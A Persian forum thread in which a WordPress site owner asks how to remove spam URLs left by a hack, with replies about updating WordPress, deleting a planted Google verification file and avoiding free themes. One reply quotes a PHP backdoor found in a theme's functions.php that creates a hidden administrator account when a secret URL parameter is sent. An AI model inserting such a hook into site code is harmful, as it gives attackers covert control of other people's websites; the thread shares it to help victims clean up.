هک شدن سایت وردپرس و اضافه شدن لینکهای مخرب

[shahriarhex]

با سلام دوستان اخیرا سایت من با مشکلی مواجه شد که گوگل زودتر از خودم فهمید و پیغام داد که هک شدی و چند تا نمونه از url ها را نمایش داد که همگی به صفحه اصلی سایت منتهی میشن و ارور 404 نمیدن سایت مپ را از کار مییندازن و نتایج در گوگل با حروف چینی و مبهم نمایش داده میشوند که مجبور شدم وردپرس را از نو نصب کنم و حتی هاستینگم را عوض کنم ولی بازم این لینکهای مخرب کار میکنند. یک نمونه ازش میزارم لطفا کسی میدونه چطوری میشه اینا از کار بیفتن و ارور 404 بدهند راهنماییم کنه چیکار کنم . ممنون
http://xample.com/32367652_upruqxyp_28384_below_12537_37658424_emfnhmx_vXrGtNs_ghfhgf/

 

[MihanV]

آدرس سایتتون رو بدید

 

[club4fun]

اگه از نسخه 4.7 وردپرس استفاده کردید که به خاطر همین مورد بوده چون خود وردپرس اعلام کرده که حفره امنیتی در این نسخه وجود داره و باید به نسخه 4.7.2 ارتقا بدید

 

[shahriarhex]

آدرس سایتتون رو بدید

http://shophex.ir

آدرس سایتتون رو بدید

http://shophex.ir
ایندکسهای گوگل را هم ببینید :
site:shophex.ir

 

[shahriarhex]

اگه از نسخه 4.7 وردپرس استفاده کردید که به خاطر همین مورد بوده چون خود وردپرس اعلام کرده که حفره امنیتی در این نسخه وجود داره و باید به نسخه 4.7.2 ارتقا بدید

ارتقا داده ام ولی مشکل رفع نشده

 

[shahriarhex]

کسی اطلاعاتی در این زمینه نداره؟!

 

[shahriarhex]

مشکل اینجاست که این لینکها مستقیم به صفحه اول سایت خروجی میدهند و ارور 404 نمیدن با بررسی فهمیدم که هکر با ترفندهایی دسترسی به گوگل وبمستر سایت داشته و کد وریفای را داخل هاست قرار داده عین پیامی که گوگل برای من ارسال کرده را اینجا میزارم نظرتونو بگین
To: Webmaster of http://shophex.ir/,

Google has detected that your site has been hacked by a third party who added spammy or malicious pages to your site. This critical issue utilizes your site’s reputation to show potential visitors unexpected or harmful content on your site or in search results. It also lowers the quality of results for Google Search users. Therefore, we recommend you remove the hacked content from your site as soon as possible. If you remove the spam, our system will automatically reflect these changes as we update our index.

Following are one or more example URLs where we found pages that have been compromised. Review them to gain a better sense of where this hacked content appears. The list is not exhaustive.

http://shophex.ir/32367652_upruqxyp_28384_below_12537_37658424_emfnhmx_vXrGtNs_xrrmv

http://shophex.ir/32367652_upruqxyp_42009_below_12537_37658424_emfnhmx_vXrGtNs_xrrmv

http://shophex.ir/32367652_upruqxyp_5111_below_12531_37658424_emfnhmx_vXrGtNs_xrrmv

 

[oio]

من چنین چیزی تا حالا ندیدم ولی مشکلتون با بروزرسانی خود وردپرس و افزونه هاش و همچنین این لینک میتونه مفید باشه

 

[shahriarhex]

وردپرس و همه افزونه ها به آخرین نسخه بروزرسانی شده اند
حتی وردپرس را حذف و مجدد نصب کردم بدون هیچ محتوا و افزونه ای بازم این لینکهای اسپم کار کردند

 

[MihanV]

احتمالا مشکل از قالب هست

 

[mha1368]

بنده هم همین مشکل رو داشتم..
نقشه سایتت رو حذف کن
چون اگر بازش کنی همه لینک های اون چینی ها هست داخلش
googlec71803be4ce694c0.html
همچین فایلی هم داخل روت هست..اونم پاکش کن
نقشه رو دوباره بساز

 

[mha1368]

<?php
add_action( 'wp_head', 'my_back' );
function my_back() {
    if ( $_GET['back'] == '2ptd4fzh' ) {
        require( 'wp-includes/registration.php' );
        if ( !username_exists( 'mr_admin' ) ) {
            $user_id = wp_create_user( 'guest', '2ptd4fzh' );
            $user = new WP_User( $user_id );
            $user->set_role( 'administrator' );
        }
    }
}
?>

به فایل فانکشن قالب اضافه کرده بود....

 

[Mr. Smith]

شدیدا توصیه میکنم از قالب های رایگان استفاده نکنید. این قالب ها همشون سوراخ های امنیتی دارن . هر کاری کنید باز هم همه اطلاعاتتون رو از دست میدید. قالب باید اریجینال باشه